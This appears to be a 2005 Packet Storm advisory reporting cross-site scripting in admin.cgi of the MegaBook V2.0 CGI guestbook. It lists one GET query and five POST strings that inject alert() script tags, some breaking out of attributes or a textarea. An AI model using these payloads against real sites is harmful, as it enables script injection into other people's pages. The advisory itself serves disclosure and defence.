ultimateCGI.txt

2005-08-06T00:00:00
ID PACKETSTORM:39088
Type packetstorm
Reporter SpyHat
Modified 2005-08-06T00:00:00

Description

                                        
                                            `  
  
The ultimate CGI Guestbook Scripts MegaBook V2.0 appears vulnerable to Cross Site Scripting, which will allow the attacker to modify the post in the guestbook. The affected scripts is admin.cgi   
  
URL: (http://www.(yourdomain).com/(yourcgidir)/admin.cgi)   
  
I have tested the script with the following query:  
  
?action=modifypost&entryid="><script>alert('wvs-xss-magic-string-703410097');</script>  
  
I have also tested the script with theses POST variables:  
  
action=modifypost&entryid=66&password=<script>alert('wvs-xss-magic-string-188784308');</script>  
  
action=modifypost&entryid=66&password='><script>alert('wvs-xss-magic-string-486624156');</script>  
  
action=modifypost&entryid=66&password="><script>alert('wvs-xss-magic-string-1852691616');</script>  
  
action=modifypost&entryid=66&password=><script>alert('wvs-xss-magic-string-429380114');</script>  
  
action=modifypost&entryid=66&password=</textarea><script>alert('wvs-xss-magic-string-723975367');</script>  
  
  
Yours,  
SpyHat  
`